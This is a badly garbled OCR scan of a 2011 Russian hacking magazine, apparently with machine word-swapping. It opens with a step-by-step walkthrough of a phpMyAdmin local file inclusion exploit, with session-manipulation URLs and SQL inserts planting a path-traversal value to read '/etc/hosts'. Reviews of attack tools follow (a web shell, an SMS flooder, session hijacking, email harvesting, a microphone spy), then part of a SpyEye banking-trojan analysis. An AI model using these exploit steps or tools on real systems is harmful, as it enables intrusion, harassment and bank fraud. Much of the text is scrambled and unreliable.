.,...ltff : • : 0 : S:SJ1tfiii, : / : /Mr/И III/ .. 00flt
t 011 : • : 0 : 0 : 0i..,.tн с--.- s-ct : / : /nrlltl•lмl8flll

PMA_getM lM Е верн ут ь надлежащий нам скопление $GLOBALS[ "mim e_map" ] .
0. Переопределить$_SЕSSIОN[ "relation" ] равным образом тем самым сформиро­
вать желаемый нам сосредоточение $cfgRelation.
Это не грех сделатьдовольно пр осто .

HJ : • : II:KS II: ItJIIIIINI :/:/нrJ HI I/M18fll

ti-:• :I :ISSn :IIIII111811Ael :/:/nr/ ltlll/ 018l.,tl

. -:•:r:ta :o - ,, , ........,. : """"""•-•="..,""I.IIJ мt 011 t •
-:• : I:I ; ..,.,. Sifhptttt :/:/IКI"/ Itiii/MlOfll

=;;~~; :~~~..":".:.~~=~~:-.:~:::~~~~z~~~~;:r~

..

s-.. : • :2S : 0S:StiiiiN11 Slllolltt t lfll ltнr : /t.W/ f,..1/tlif111t ... f"Н:/Hr/Яiii/H I.. I II
..illllll11 : • : 01 :21:1ffl... l1ftfH1tiiii" : /IOff/ f,..l/...-:llff"IIIIII/ IМ1"111•
IJIМI : • :SI:,. : IIIНII.М.h : / :/Hr/ llit/Mittill

,....., :• :., :12:,KIIft HHtr ,и м.-- :t-tl lttllt: / tt.r/ttlll/1111"11111
..,rfliiJif : • :.. :•l:,fllfll".l""" """" :/tllr/ l"ftJ :/ n r J •IIlii/MI .. lll
_acr : • :H:H :acr "....- :/ tiW/ ""ftf : /иr/ ..1Jt/иJ.-t1"
:-r : • :H:H :WC, ,lf1Нfe-nw :/IИ/ •,..1 0-"Wi lc : /nr/1KI111illr•tcJ-rlwclc

Н е выходя изо РМА , открываем новую вкладку во спринклер р е равным образом вбиваем
тама такую из сы л ку:

,., : • : 01 : " :"" t tf flct...,. : /-n l •tнt :/llr /IIII•Jи1 .. 011

-

: • :11:11: •1•

lli., v.to

lwlr :l-li •t••t:/..,/ 0111•/иl..l ll

......, : • : 0ffi-" : Hf :NI : ..".I•IIIf1• 011r : /-• l l tHt : /нr/ ..III/ Hlltjllt
•t•ff : • : 0181 : 0: 0Мf" & :/lleМ/Itlff :/11111/tc 011

http: //p hpMyAdm i пLiпdex. php?to keп=< тe кyщий в таком случае кен>

::r~;:~=~:; ~~=~~.;~~~~~~~~~:~~~~:..

&sessioп_to_uпset=<*x* > &_SESSION[relatioп][1][commwork]=1

....S• : • : t . . : l ::/•н-1-/U!dii : /)111/JII
%1fll : • : t • : tlll:•lflri .... :/8Н0/~1811 :/Hr /IK11/III IIIIII"III
t "t : • : 0Nt: 0111; .... t l0t :/Hr/~.,.t :/IНO/I KIIJII1JtJIIИII

&_SESSION [ relatioп] [1] [ mimework]=1&_SESSION[ re lation] [1]
[ d Ь]=test&_ SESSION [ re lat ioп ] [1] [ column _ iпfo]=pmatest

llкkН : • : tM : tM : IItr • : .nм-/tlKIII.: /IIII II/Hllf11

lttht ctut JWnt 0t uнd e.g. 0n cll_uнr_tunco then 0t см contМisome d8ngerous ch8r8cttrtsuch n J.lt 0t
recommended to not ute lhe Ltttr~ ln such funcdonl or • ttatt v8f1f"y tht ~ tn _autoJoad().
06
07

08

Которое cr.wt8ЧIIIТ, ЧТО 0CIW4 МW МО*еМ 011ММЬ Nl nap8М8fPW фумlщММ ~)( ICIUICCIММ, ТО СТIНОSМ1ЪСJI
0<пМ011МWМ У"Q8ММ0С"П11 ТИМ L,...,L

~ F;;~;;;;;~;~.~~--~·-~~~IIIWd
04
05

t~~-uиr_rvnc(array(".J.J.J•tclpasswd"CJ-,"tesr));

П об др обнее относительно происходящей со через такого метода перезапи вместе с равным образом
глобальных п е ременны х читай во предыдущем номере жур н ала.

З. Проинклудить ограниченный обложка , перейдя по мнению ссылке http ://
phpMyAdmiп /sql.php ? db=test&taЬl e=i пt eger&tokeп=< тe кy щии токе н >.

Если до сей времени прошл по отношению нур ма льн о, в таком случае с грехом пополам ваш брат ш е табли цы iпtegeг появит­

?>

ся со д ержимое файла

Инклуд чрез __ autoload

/et c/hosts .

ВТОРОЙ ИНКЛУ
Следующий хороший инклуд , кой автор сих строк ра сс мотрим , является

После небольшага поиска п в рассуждении коду становится яс н о, ась? самый удоб­
ный к нас бис этой фи н для ци да проис х одит на файле

sql.php:

общим для того всей 0.4 .х -ветки phpM yAdm i п " a вплоть прежде версии 0.4.3.1
включительно . Снова заходим бери правительственный сайт отметка равным образом ищем
advisoгy п од названием

~тQ!j>айл вместе с нужными нам ф)"!!IS_Ц""
и!l
я""
м,.._
равным образом _ _ _ _ _ _ _ __

reguire

опсе ". / libraries/disRlay_tЫ.lib.P-hp_"; _ _ _ _ _ __

/Lесли задана БД, так от оздается ва ж ный чтобы нас м штукарь вместе с ив $cfgRelatioп

if

(strleп($db))

сле дую щ ий ко д во файле

sql.php:

$mime_map=PMA_getMIME($db, $taЬle);

{

require_oпce " . / libraries/relatioп.lib . php" ;
_$cf_gRelatioп

PMASA-2 011-10. Опять смотрим для патч, пред­

лагаемый разработчиком , равно понимаем, в чем дело? проблемным является

=

PMA_getRelatioпsParam();

__________

foreach ($mime_map as $traпsformation) {
__ $iпc:LY.Qe_file=$j:_r_i!пsformatioп [ "traпsformatioп" ];_ _
if__(file_exists(~Д ibrar i es /traпsformations / " . $iпclude_file))_L

!"!"l!\_displayTaЬle ($res ult,_$disp_mode, $aпalyzed_sql);

$traпsformfuпctioп_пame

=str_replace(" . i п c .php " , "

$traпsformatioп[ " traп s fo r matioп " ]);
Функция PMA_displayTaЬle задана во обложка е

./libraries/ display _

tЫ.lib.php, безграмотный буду давать начало в этом месте е е шифр , вместе с кажу лишь, в чем дело? на этом месте а

require_oпce "./lib r aries/t raп s forma ti oпs / "

.

$iпclude_file;

вызывается круг обязанностей PMA_displayTaЬleHeaders, на кото р ой да формиру­

ется требуемый нам ма со сив

Чтобы вынуть душу д что до э т что касается г относительно кода, нам ничего не поделаешь пр ойти следующие

$GLOBALS[ "mime_map" ] .

проверки:

0. $GLOBALS[ " is_ajax_request" ]==true . Л егко п оня ть , сколько для того удо ­
И з вышеперечисленного сле д ует, что такое? с целью выполн е ния л окал ьног в отношении
инклуда я должны пр оизвес ти сле д ую щишки е д ействия:

0. Авторизоваться во phpMyAdmin"e да сформировать двум таблицы на доступ­
утнапиштим нам базе данных .
Первую таблицу да мы со тобой если м получать , обра щ ая вместе с ь ко

влетворения э т ого побег л овия я должны п ер е принести ск рипт лучше п сливки

параметр ajax_гequest.

0. е==$пum_rows

01

$is_affected. Туту нас банан варианта: обра ­

щ ение для табли ц е лишенный чего запи не без; ей, alias на н а шем обращении для не без; крипту

sql .php равным образом вызы­

вая тем от амым нужные нам функции :

повинен взяться какой-нибудь -л поскольку sql-зaпpoc . П е рвый модифицирование безыскуственный ,

дальнейший капелька сложнее (зк из плоит для того второго варианта ищи на
сносках] .

CREATE TABLE "test" ." iпteger" ( "1" INT NOT NULL ) ENGINE=MYISA!i_;
INSERT INTO "test" ." iпteg~(_"l"_j VALUES ( "1" ); _ _ _ __

Разобравшись не без; условиями, нам остается лишь только вспомнить, почто
назначение

Втораятаблицанужнанамдлясозданиякорректногомассива

$GLOBALS[ "mime_map" ] :

PMA_getMIME нам еще встречалась перед этим равно в чем дело? про форми­
$mime_map автор должны располагать путь

рования нужного нам массива

ко базе д практически ны х phpm yadmiп тож располагать допустимость манипулирова­
ния з л еме нтами массива

CREA]J TABLE "test "." pmatest" ( "columп_пame" INT NOT NULL ,
"mimetype" INT NOT NI.J_IJ,_, "traпsformatioп" ТЕ ХТ NOT_NU_LL_, _ __
" traпsformatioп ORtions" INT NOT NULL, "db паmе " ТЕХТ NOT NULL,_
"taЬle паmе" ТЕХТ NOT NULL) ENGINE=MYISAM ; _ _ _ _ _ _ __
INSERT INTO "test" ." gmatest" (" columп пате" . "mimetY.p".,e._"._
, _ _ __
"traпsformatioп ", "traпs_tormatioп_optioпs ", "db_пame ",
"tаЫе_паmе" ) VAIJ)ES (" 0", -".1"_, " .. / .. / .. / .. / .. / .. / .. / .. /etc /дosts " ,
"1", " test ", "iпteger" );
В равнина traпsformatioп м ы д олжны указа ть п уть д касательно локального
файла, на фон db_пame - термин праздник базы данных , которой пр ина дл ежит

$_SESSION. Прич ем д ос т уп ко базе д анных
0.4.3.1, эдак

phpmyadmiп нам необходим всего-навсего во версии phpMyAdmiп

наравне на потому что л ее ранни х версиях су щ ествует возмож н отросток перезаписи
глобальныхпеременных .
Итак, во по отношению д ан изо вариантов исполь з ования данного инклуда для того
версии phpMyAdmiп

0.4.3:
0. Логинимея на phpMyAdmin равно создаем нужную нам таблицу :

CREATE TABLE " test " ." pmatest " ( "columп_пame " INT NOT NULL ,
"mimetyge" INT NOT NULL , " traпsformatioп" ТЕ ХТ NOT NULL ,
" tra n sformatioп ORtioп s" INT NOT NULL_,__"_Q_Q_o_a mg_"_ЛXT NOT NULL,_
" taЬle паmе" ТЕХТ NOJ NULL }__ENGI]:J_
E_=_f-1\(_ISI\M_;, _ _ __

ХАКЕР

00/153/2011

Тысяча равным образом сам согласно себе инклуд

[J@][R

·">SourceForge- phpmyadmin/phpmyadmin/commitdiff- Mozilla Firefox
!Р.айл

()>авка

i!ИА

ЖУРнал

:iao<naAIO<

~трументы

~

• С Х @ О
(::: http://Pl:Jmyadmn.gitSO<rcefurge.net/git/gi\weЬ.cgl?p=l*!"myadmin/pl"!)myadmn;a=commi1dlff;h=5eeЗS7ae ~ "{} -1..,1~"1_-_Goog___,"--ie-------"P"-"1
D нача,.,...,. страно.ца >\ Лента моеопей
-

"11 •

Самые nonynЯj:>Н>Ie

0

Откrю...,ть •

.1. COokles •

/

оu.ибок CSS мет· ~ Формы·

0:!!1 Графика·

О ИНфо •

Q Раэное •

/? Комтуры • iRJ РаЭМОJЬ!· )i: \IН:тр~ы •

~ КОА • JA] настройо.t •

0::: Sourceforge - phpmyadmin/ ph... j + 0
Flxed

filteriлg

author

of а file path, which allowed for directory travenal,

неграмотный РМАSА...

Herman van Rink <rink8inittouronl >
Thu,

ЗО

Jun 00 01 08:

09:З 0

+0000 (20: 09 +0200)

conrnitter Herman van Rink <r1nk8 inittour что до nl>
Thu,

ЗО

Jun 001 0 08 : 09:З2 +0000 (20: 09 +0200)

ChanqeLoq

P ch tЫоЬ lt!stщ

libraries/display_ tЬl o lib об php

eaoh !ЫоЬ t tWstn

cliff --g1t

а/~

b/CI!a!lgd.oq

index 03f0368 .. 02а94а3 000644 (file)
- -- a/ Change:Loo
Н+ Ь/ChengeLoq

08 -9 , 0 +9, 0 08 ~Нe:adURL: ht.t.p ~ : 0 /phpayadJI.in. svn. sour:ceforqe: .ne:t./ svnroot/ phpayadJtin/t.tunk/phpJII:yA
- [secutity] Fixed poss1Ыe ses:sion aanipulation in nekey authenticatton, :see PIU.SA-2011-5

- [secut:ity] Fixed

pos:siЬle

code inject.ion incase session

variaЬle:s

are coaproaised, see

- [secutity] Fixed tegexp quot.inq issue in Synchtoniz:e code, :see РКАSА - 0011-7
а tile pe.th, vhic:h allowed t or direc:tory traversal, see

+- [:secux:ity] Fix ed tilcering ot

РКАSА-2011-б

PИASA-20 ll w8

З. З.lO.l (2011-05-20)
w (security] xss on Tracking paqe

d1ff --git

a./liЬraries/display tьl o liЬ . pl!p b/liЬraries/display tьl o liЬ . p)lp

inclex 0et333d .. 08бсеЗе 000644 (file )
- -- a/ libraries/ clispl ay tЬl o l ib . php
+++ Ь/libraries/display=tЬl o liЬ o php
08 -1220,7 +1220, 0 08 tunction РИА display"I"eЬleBody("$dt result, "Hs display, $аар, $anal yzed зql ) {
0t ($GLOBALS( •ctqRela~on 0 )[ 0 aiaewotk 0 ) t." i"GLOBALS{ "ctql )( "BrovseiiШ" ] ) (
it (1sset($GLOBALS[ "aiae аер" ]($aeta->nu.e]( "aiaetype " ]) " " isset($GLOBALS[ 0 aiae аар 0 )($aeta->nue)( 0 ttanstotaation" )) "
$inc l ude file • $GLOiALS[ " aiae аер" ] ($aeta->nue ][ "ttanзto ru.tion "] :
$include=tile • PИA_secutePath($GLOBALS[ "aiae_aap"} {$aeta->nue} { 0 ttansfo raation 0 ) ) :

+

!eapty($GLOBALS[ " aiae_ae.p " ] [faeta->nue]

it (file exists ( 0 . /libraties /trenstotaations/" . Hnclude tile)) {
$trWtotatunction_nue • str_replace ( 0 • incophp", " " , -,GLOВALS( "aiae_aap" )[$aeta->naae)( 0 ttansfotaation" ]) :
phpМyAdmin

~

0999-2010- ~ nc . ,AI~ Rмe<Ved

<,
Патч про LFI-уязвимостей во phpMyдdmin"e

INSERT INTO "test" . "pmatest" (" column_name", "mimetype" , _ __
"transformation", "transformation options" -~ name", _ _ _ __
"t aЬl_g_n_a nш."_)_VALUES_(X-"-L....:/ . ./https://www.scribd.com/. ./.. 0__,_,_/._._j_._._/._etcLhosts", _ _
"1", "test", "<имя незначащий таблицы, ко которой автор сих строк будем обращаться>" );

phpM yA dmin оченно опасны получи и распишись shагеd-хостингах . Здесь открыва­
ется необъятный пространство в целях действий : твоя милость можешь нетрудно зарегать

личный аккаунт для томишко а сервере, идеже нате хо дится сайт жертвы, а впоследствии
n оиметь таковой са мый сайт вместе с nомощью дефолтной с целью таких хостингов
системы у nр авле ния

0. Записываем во сессию нужные нам способности равно тем самым формируем
полезныйдля дальнейшихдействий скопление $cfgRelation:

MySQL базами данны х phpMyAdmin.

НИЕИТОГОВ
Вот так, дорогостоящий лектриса . На современный дата тема, казалось бы,

htj:p_:j/._p_b_J2/1YAdmio/iod_gx._JillR?token; <тe~y_щий то~е"-"нl<.
> _ _ _ _ __

такого избитого ба га, что лакал ьный/удаленный инклуд, живет равно

&session_to_unset=<*x~> &_SESSION(re lation](l](commwork].=.1_ _ _

процветает. Постоянно находятся новые способы экс nл уатации,

&_SESSION [relation] [1] [ mimelol9r.1<]=1&_SESSION(relation] [1] [ db ]=test
&_SESSION(relation][1][column_info);pmatest

открываются неиспользуемые прежде внутренние резервы языка РНР, а
вот и все упорно п овышается ватерпас знаний ба го коnателей объединение
всему миру.

0. Заходим соответственно следующей ссылке да инклудим нужные нам данные:

Особостоитотметитьтотфак~чтодажевтаки х распространенных
оживка х, как бы

http: LLJilliШ!YadminL sgl. JillR ?do_tra n ~fgrmations=1&aj ax_reguest;1
&tаЬlе=<Тут отчество nустой таблицЫ>&dЬ=tеst&tо!(еn=<валидный тo~tt2_

phpMyAdmin, равно по мнению текущий будень встречаются уязвимости дан­

ного тиnа. Эти простые данные будто бы по части томище , что-то разработчики софта
никак не хуй еляют должного внимания зтомутипууязвимостей равно никак не хотят nро­

д умать целое возможные варианты передачи данных на в отношении жете сные функции.
В общем, настоящий инкл удовлетворительно имееттуже самую природу. в чем дело? равно предыду­
щий, в такой мере в качестве кого основная предлог его появления- сие осуществимость

маниnулирования значениями на массиве

$cfgRelation.

Также могу кинуть камешек в огород тебе, ась? пара об n исанных инклуда во

ХАКЕР

00/153/2011

Как было nоказано ранее , их существует немало.
Конечно, сыскивать инклуды становится всё сложнее равно сложнее,
да аз многогрешный надеюсь, ась? данная дело подтолкнеттебя ко новым исследо­
ваниям . :::К:

075

ВЭЛОМ/Х-ТООLS

Marlicq 084888, http://s nipper.rul

X-Tools

СОФТ ДЛЯ ВЗЛОМА И
АНАЛИЗАБЕЗОПАСНОСТИ

ОС:

ОС:

ОС:

Windows 0000/
ХР/2 003 Server/
Vista /2008 Server/7

*nix/win

Windows 0000/
Х Р/2 003 Server/
Vista /20 08 Serve r/7

Автор:

profexer
Автор:

......
·-·

Автор :

ФIМ"1CQ:nl~-:

cOn Difesa

РНР- ВЕБ-ШЕЛЛ
Очень сплошь и рядом до нашим братом встает поручение

~~y~~eJCQSNS~.ьr

0

0 ь;;;;- . ICOJ

JiJ

Zdez BiiYa

P.A.S.

Оченьдавно во наших обзорах отнюдь не было никаких

На очереди единаче одна классная nрограмма ото nо­

восстановления строки по мнению ее МD5-хешу. Не

веб-шеллов . Настало времена исnравить зто недо­

стоянного фигуранта нашей рубрики

менеечастотакаязадачауспеш н овыполняется

разумение. Встречаем:

Как конечно изо названия,

P.A.S.[phpweb-shell] ото

Zdez Bil Уа .
ICQ sms flооdег-зто смс­

от через разнообразных словарей, разбросан­

мембера форума гdot.oгg ргоfехег"а. Помимо всей

флудер мобильного телефона, ходящий после

ных по части Сети. Но в чем дело? делать, даже если такого типа переборка

стандартной функциональности, шел л имеет галерея

запись

растягивается держи неточно продолжительный число да во

фишек:

словаряхnросто-напросто нетискомой строки?

0.
0.

ICQ. Особенности

равным образом функционал тулзы:

nоддерживаются гостиница МТС , Билайна да

Авторизация согласно кукисам .

Мегафона ;

Шифрованиешелла твоим собственным

единовластно выпуск

строк равным образом уподобление их хеш а не без; целевым. Этот про­

ключем: согласно адресу bit.ly/г36L3k не грех сконцентрировать

текстабонентуприходитввиде"rпрефикс*,

цесс равным образом называется бру т форсом .

шел л не без; уникальным nа сверток ем. А nарольдля

icq] *текст*";

Намостаетсятолько посимвольнаягенерация

Выполнение данного процесса держи одной ма­
шине выглядит п что касается меньшей мере нерационально,

0.

JCQ позволяет отnравить 0 см с;

ш елла в нашемдиске-«1 ».

многоnоточность;

Файловый управленец nоддерживаетгруnnо­

статистика отправки см вместе с [ « бзды » равным образом «гуды >> ].

позтомуяиспешу пр едставитыебеспециальное

вое ликвидация , n еремещение, коnирование,

программноесредство,предназначенноедля

перекачивание да загрузкуфайлов равно директорий.

стандартныхсмска~составляет160символов

SQ L- клиентдля

[латини це й] не ведь — не то

брутфорса нате вмиг нескольких ма ш инах .

0.

Итак , DefBгute-зтo концепция распределенного

перебора строкдля МD5 - хешей. Данная теория
состоит с серверной равно клиентской частей .

Серверная кусок IDefBгute v1 .0.exe] вам полня ет
фун.к ц ии генера ци и, учета равным образом п ередачи диапазо­

0.
0.
0.
0.

MySQ L, MSSQL,

PostgгeSQL ,

Максимальная метраж текста, наравне да закачаешься всех

00 символов [юникодом, русски­

удобнодам n ить БДи таблицы.

ми символами].

Bind рогt [Ре г!].
Back-connect IPeгl] .
Рогt scanneг IPHPI.

никакие сnе ц иальные знания. Достаточнолишь

BгuteFoгce получи и распишись основе /etc/passwd к

Для основания работы от утилитой тебе отнюдь не нужны
загнать номердля флуда, выпуск да nа занятие

SSH,

ICQ,

учредить формулировка sms, найти цифра n отоков

нов строк клиентам . Клиентдля DefBгute пред­

FTP, РОРЗ, MySQL, MSSQL, PostgгeSQL

да придавить держи кноnку из зеленой стрелкой. Дальше

ставляет лицом консольное приложение, величина

вместе с возможностью настроек.

флудер всё сделает вслед за тебя.

Выnолнение оболочка нд ОС да РНР-кода

Также на комплекте пусть будет так nрограмма << ICQ sms
check>> в целях отбора номеров вместе с достуnными SMS.

запуска которого следующий:

0.

различными способами.

0О. Малый размер [15 Кб].

Работа из чекером равным образом выглядит будет три­
виально: выбираем завершающий обложка не без; номерами

Кроме этого, возбраняется не. сказать удоб ны й

телефонов, выбираем nотоки, вводим nутьдля

разбойник находящуюся сообразно aдpecy www.defec. г u/node/4

Также горячо рекомендуютебе nрочи­

крайне воздержанный проектирование скриnта : чернявый цветок да вер­

сохранения файла со результатами nроверкии

статью автора об особенностях функционирова ­

стка за центру экрана ввек были равно будутсамым

бери выходе n олучаем номера, n одходящие на

ния да nроцессе создания nрограммы .

удобным вариантом.

конструкция ног что касается флуда.

076

ХАКЕР

00 / 053/ 0011

X-Tools

ОС:

Android
Автор:

bponury

FACENIFF: УГОН ЧУЖИХ СЕССИЙ СО СМАРТФОН.А;
FaceNiff-этo единаче больше безбашенное прогресс

возьми любом Аndгоid-смартфоне лукнуть таковой

идеи аддона Fiгeshe ep, творец которого впервинку

хек-инструмент да перенимать аккаунты самых

ес угонка чужих НТТР-сессий доступным

разных сер висов:

в целях любых желающих. Установив продолжение

да т. д.- общей сложности паче 0О. Все, что-нибудь нужно, -это

FaceBook, Twitteг, ВКонтакте

Fiгeshe ep на личный Fiгefo x, позволяется общий ни ложки

подсоединиться ко нужной беспроводный недотка равно

безграмотный делая п ерехватить сессии

запустит ь прило жение !можешь вглядеться ви­

Facebook, Twitt eг,

Flickг равно Amazoп.com тех пользователей, которые

деодемонстрацию : Ьit.ly/qbzwGh l. Правда , с целью

работали во пирушка а беспроводный се ти равным образом никак не исполь­

сдержатьпотокскрипкидис,авторограничил

зовали безопасные способы аутентификации.

максимальноечислосессий тремя-дальше

Таким образом исследовательхотел приманить

нужно перевоплотиться ко разработчикуза специаль­

не заговаривать зубы для этой проблеме безграмотный лишь только специали­

ным активационным кодом.

стов соответственно ИБ, хотя да широки х масс .
Со зда тель

FaceNiffтpeбyeт наличия телефона возьми Aпdгoid
не без; рут-доступом. При этом симпатия пятерка себя чув­

Fa ceNiff уходите единаче ниже равным образом

прилож е ния! Да-да , скача во арk-пакет от про­

ствует во любых, хоть защищенных сетях IWEP,
WPA равным образом WPA21. Единственное пр е пят ствие-это

граммой ( faceпiff.poпuгy. пet l, дозволено приземленно

используемая во бредень методика ЕАР.

реализовал идею F iгesheep на виде мобильного

ОС:

ОС:

ОС:

Windows 0000/
XP/2003Server/
Vista/2008 Server/7

Windows 0000/
Х Р/2003 Server/
Vista/2008 Server/7

Windows 0000/
ХР/2003 Server/
Vista/2008 Server/7

Автор :

Автор:

Автор :

SLESH

FlameofSoul

xmadstyle

ЕМАIL-ГРАББЕР XSPRY
Если твоя милость помнишь, на прошлом выпускеХ-Тооls

Теперь nереходим ко замечательному мыльному

Теперь а нуте вернемся ко взлому

был описан необыкновенный микрофонный

граббер усик лаконичным названием XSpгyt. Данная

мательно за смотрим сверху прогу

резидент

насчет га поможетт ебе быстро равно бурно спарсить всё-таки

MD5 равно вни­
MD5 Опliпе Sсаппег,
созданную мембером Античата xmadstyle спе ци­

препроводить тебе изумительную модификацию

встреченные email-aдpeca из выбранного тобой

ально ради прогона хеш ей п что касается специа лизирован ­

данной программы подо названием

сайта, а после этого твоя милость уж лично основательно сможешь опре­

ным онлайн-сервисам .

MicSpy ото Слеша. Теперь а пришло момент
MicSpySE

IStгeam Editionl .

разбивать ся, чтоделать вместе с полученным списком. Но

Основная фича данной утилиты, во вкусе определенно с
названия, заключается на том, зачем дребезжание передает ­

Итак, данная обслуживающая программа представляет собою

помни , аюшки? автор завсегда были равным образом будем насупротив вместе с пама!

ска нер МD5-хешей бери пр е дм ет их наличия на раз­

До стоинства равным образом лишения проги:

личныхонлайн-базах .

ся наблюдателю на испарина оковам режиме. Основные

однопоточность;

изменения по мнению сравнению со предыдущ ей версией

заданиетай м-аута;

многопоточность !до 050 потоков!;

шпиона:

низкое потребл ение сис темны х ресурсов;

случай выбора формата входных

недостаток админки;

отсутствиеэвристикиlсайтнесканитсясам~

да выходных данных;

вслед за письзву ка вяще малограмотный производится на файлы;

устранение дубликатов;

осуществимость выбора онлайн-сервисов

существенноуменьшен размер: в соответствии с сле

оставление пройденного быть крахе;

<<на лету»;

упаковки UРХ"ом ра зме р будетсоставлять

подробные отчеты сообразно найденным мыла м равным образом

возможностьсканирования с женские груди

всего-навсего

пройденным ссылкам .

иначе файла;

0632 байта;

Особенности сканера :

передачаданныхвпсевдопотоковом

Работа со прогой выглядит достаточнотривиально :

режиме чрез подсак ;

0.

реальность проелушивания потока

0. Дальш е грабб ер самовластно попросит определить всё, аюшки?

при помощи

WinAmp;

допустимость одновременного

подключения256пользователей .

Запускаем ехе-файл .

во ягодицы или — или файл;

н еобходимо чтобы основные положения парсинга.

grabber.exe -h

winne.com -р 00 -t зеее. Здесь норма обо­
Использовать язык неграмотный просто, а весть про­

спокойный

GUI, возможностьсворачивания втрей .

Прогаподдерживаеттакиеизвест ныеонлайн -

Также твоя милость совершенно усишко пешно сможешь заниматься из
утилитой равно подле помощи консоли:

реальность сохранения результатов

сервисы, как: cOIIisioп . пet , tmto . oгg , www.md5this .
com , md5.hashcгackiпg.com , md5online.net ,
hashkilleг.com да е ще близ 0D других.
Особое первый план следуетобратить получи удоб­

значают сле д ующее :

h- хост(без http://l;

нейшие встроенные макросы, используемые около

зачем дозволено натравливатьлюбой потоковый

р-порт;

экспорте равным образом импорте списков хеш ей на сканер:

плеер получи и распишись местоположение http://[IP жертвы]:4545. Осталось

t-тайм-аут на микросекундах.

лишь прикрутить н ехит рую шанс back

Все не без; парсенны е мыльникисохраняются во

сто: симпатия загружается держи пэвм жертвы, за

con nect "a -и тулза достанет по сути дела бесценной.

txt; ссылки пользу кого

mail.

парсинга, которые твоя милость приготовил

раньше к определенного сайта, кидай во liпk . txt.

ХАКЕР

00/153/20 01

[MD5] -текущий хе ш;
[DATA] -твои комментарии lлогин, сериал равно т. д . l ;
[ТЕХ Т]- исходная ст рока интересах хе ш а lпарольl;

[SERVICE] -адр есть сер ви са, расшифровавшего хеш.

077

MALWARE

Сергуня Никитин

пролаз
зла
МАСШТАБНЫЙ ТРОЯ Н

SPYEYE ПОДХАКЕРСКИМ
МИКРОСКОПОМ
В ходе проведения расследования
одного с инцидентов на наши цыпки

по головке не погладили заведование для известнейше­

му вредоносному ПО- SpyEye. Что
самое примечательное , справочник

было в духе сверху английском, круглым счетом равным образом сверху рус­

-

В этой статье рас·

сматривается SpyEye
версии v1.3.25 через

д ля DD oS"a, расс ы лки из n ама, сове рш ени автор этих строк мо ш е ннич yes тв от
nл а тежными системами. Spy Eye отлично ич н по отношению n касательно д аллюр равно т н а рулон ь

На нашемдискетебя

ба н ковско готроя н а, бери це л е н же го в со во ер ш е ни е мо ш е н н ич е ­

ждетполная издание
со татьи , содержа­

щая обрисовка всех

ключей, плаrинов да
прочих тонкостей,

мента да мы от тобой рассмотрим, ась? представ­

ж иваетбумажная

SpyEye от точки зрения

ботн ет ов: на ирусы ст р емя тся для цент р а л иза ц ии да
а во томатиза ц ии. Кру nн ей ш иебот н е твоя милость равным образом со n насчёт л ьзую тс пишущий эти строки

04.03.2011.

ском языках . На примере сего доку­
ляет изо себя

n

ос л е дн ее во ремя мож н относительно сме л что до вместе с ч равным образом т ать э n охой

которые неграмотный выдер­

модифицирование журнала.

хакера, а неграмотный вирусного аналитика.

от тва со n омо щ ью сис т ем д иста н цион н ого ба н ко на ско го обслу ­
жи во а н ия. Spy Eye расnрос т р ин яет ся на на равным образом д е гот по отношению во относительно го n родук та ,
а вроде его ис n ол ь зо во а т ь-ре ш итсам n оку n а т е ль .

СХЕМА МОШЕННИЧЕСТВА
П е р на ы м д елом з л оумы шл енник n oкy n aeт S py Eye !думаю,
дл моя персона т ебя неграмотный секрет, ч так ко д моя персона тт ро яны в рассуждении д ни л юд и, а равно не без; n об ль зу­

ю т- отнюдь д ру г ие ! . В колтун nл ект е ид етсе рв е рн ая равно клиент­
ская ч акробат воздуха т и, на т ом ч да вместе с л е би лдер б от в. Ко н т р в рассуждении лл е р Ботн е та
р азме щ ает из моя особа во Сети, з л оум ышл е нн ик n по отношению ку n аетт р афик ради
зараже ни пишущий эти строки килоом n ьюте р об на . Зач а стую вз л омом ущелье т по части во равно р аз­
м е щением экс пл ой т-n ако во ради н имают не без; пишущий эти строки д ру г ие л ю ди -т е,

кото ры е nр одаюттра ф ик в целях лодка нетов. Ст а т ис т ика усище п е шн в рассуждении г в отношении
С х ема мошенничества из ДБО

зараже н ия соста на ляет почти

00 %. П ос л еза р ажен ия колтун п ью­

т ерс та н ови тсяботомиот сы л аетмассу д а нн ых н ако н тро л ле р

МОШЕННИЧЕСТВО В ДБО

ботик н е та. Ф унк ц иона л

SpyEye на нашел ь ма об ш ире н да может до самого n что касается л ­

н ят ь ся п борт равным образом нами. Зл оум ышл е нн ик че р ез а д ми н ис т р ат равно вн ую
n а н е ль конт р касательно лл е р аможетсо на ер ш ат ь м а ссу дейс тв ийсбото м ,

Покупка вредоносного ПО

во т ом ч да сле п насчёт д для л ю ч ат ь ся ч е р езуд а л е нн оеу n ра вл ени е равно nр по отношению ­

на оди т ь n л атеж равно ч е р ез со да стему ДБ О. Л огины/па р по отношению ли ко вместе с равным образом от те ме
ДБО, n да н- ко ды для токе н ам п охи щ аю тся че р ез узел ск рытн насчёт го

Шифрование исполняемых файлов

ко 14 ро на ани яда н ных с р я л ич н ых ф об р м -ф насчёт р м гр аббер.

Арендасерверовдляуправленияботнетом

альная об n е р а ц ио нн ая общественный порядок GNU/L inu x D eb iaп 0.0. В э т ой

П ос л е n охи щ е нные денеж н ые со р едс тв а л е г ализуют вместе с мы .

Гл а вны м да н со т руме нто м обычай н овки Spy Eye автор этих строк вля етс пишущий эти строки во ирту­
ОС ужеустанов л ен веб-се рв е р вмес т е из п а н е лью у пр а влен ия

форм гр аббера, а т а ко но ssh-к л ие нт да п ро ч ий инст р уме н та р ий .

Покупка трафика на определенных регионах РФ

Р дока nр ос т раняется на во иде ви ртуа л ь н ой ма ш да ны Vi гtu ai B ox.
Гл а вн ая n ане ль у n ра вл е н равным образом ваш покорнейший слуга н ужак н а дл аз многогрешный у ч ет а от та т ис т ик да п в отношении

Отправка платежных поручений

бота м , а т акже дл моя особа у пр а вл е н равно моя персона ими. Для ее ра ботик ы н еобхо ­
квартал усишко т а н ов л е н ный веб-се р ве р со п оддержкой РНР, а та для но
MySQ L-cepвep. Фавн е л ь р я д с грехом пополам н а сверху се рв е рн ую равным образом ко ли е нтскую

Вывод равным образом узаконение денежных средств

ч воздушный ас т да . К обеим пр равно л а г аю тся ан из т а ллят по части ры. Се рв е рн ая ч акробат воздуха ть
пр е дс т а вл яет со обой од равно н фай л -gа t е.р h р.

078

ХАКЕР

00 / 053/ 00 01

Глаз з ла

СЕРВЕРНАЯ ЧАСТЬ
BackConnect Server (for SOCK55 & FTP). Предн азна чен для того
работы вместе с ботами сквозь SOCKS5 не ведь — не то FТР, как не быть

0 ."::1.

ВасkСоппесt-сервер подО С GNU/Liпux .

